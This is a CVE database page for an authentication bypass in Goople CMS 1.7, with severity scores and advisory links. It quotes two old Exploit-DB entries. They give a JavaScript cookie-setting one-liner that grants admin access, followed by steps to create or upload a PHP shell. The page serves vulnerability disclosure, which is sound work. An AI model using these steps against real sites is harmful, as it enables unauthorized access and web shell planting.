CVE-2008-6118
published 2009-02-11CVE-2008-6118: win/content/upload.php in Goople CMS 1.7 allows remote attackers to bypass authentication and gain administrative access by setting the loggedin cookie to 1.
PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.89%
85.1th percentile
win/content/upload.php in Goople CMS 1.7 allows remote attackers to bypass authentication and gain administrative access by setting the loggedin cookie to 1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goople_cms | goople_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Goople CMS 1.7 - Arbitrary Code Execution
exploitdb·2008-11-24
CVE-2008-6118 Goople CMS 1.7 - Arbitrary Code Execution
Goople CMS 1.7 - Arbitrary Code Execution
---
Autore: x0r - Evolution Team
Msn: [email protected]
Cms: Goople Cms 1.7
Bug: Arbitrary File Creation
Download:
http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
Exploit:
#Attack One
Logg yourself like a normal user then in your meno go on "Notepad" (
/win/notepad/index.php ), in this notepad you can make a php shell :P
#Attack Two
Use this js code for bypass the log in: javascript:document.cookie =
"loggedin=1; path=/"; <--- tnx BeyazKurt
And then go to /win/notepad/index.php
Greetz: Amore mio oggi sono 48 giorni...Ti AmO Da Impazzire... A + M....
Bimba Mia Sei La Mia Vita...
# milw0rm.com [2008-11-24]
Exploit-DB
Goople CMS 1.7 - Insecure Cookie Handling
exploitdb·2008-11-23
CVE-2008-6119 Goople CMS 1.7 - Insecure Cookie Handling
Goople CMS 1.7 - Insecure Cookie Handling
---
#######################################################
# Author : BeyazKurt
# Contact : [email protected]
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Goople Cms (1.7)
# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
#
# Exploit :
# Open : http://SITE/win/upload.php
# javascript:document.cookie = "loggedin=1; path=/";
# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
# File : http://SITE/user/doc/FILE (or your select)
# -------------------------------
# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
# Rinia ShqiptaRe :)
# Proud 2 Be MUSLIM !
# Proud 2 Be ALBANIAN !
#######################################################
# milw0rm.com [2008-11-23]
http://secunia.com/advisories/32819http://www.securityfocus.com/bid/32437http://www.vupen.com/english/advisories/2008/3235https://exchange.xforce.ibmcloud.com/vulnerabilities/46799https://www.exploit-db.com/exploits/7205http://secunia.com/advisories/32819http://www.securityfocus.com/bid/32437http://www.vupen.com/english/advisories/2008/3235https://exchange.xforce.ibmcloud.com/vulnerabilities/46799https://www.exploit-db.com/exploits/7205
2009-02-11
Published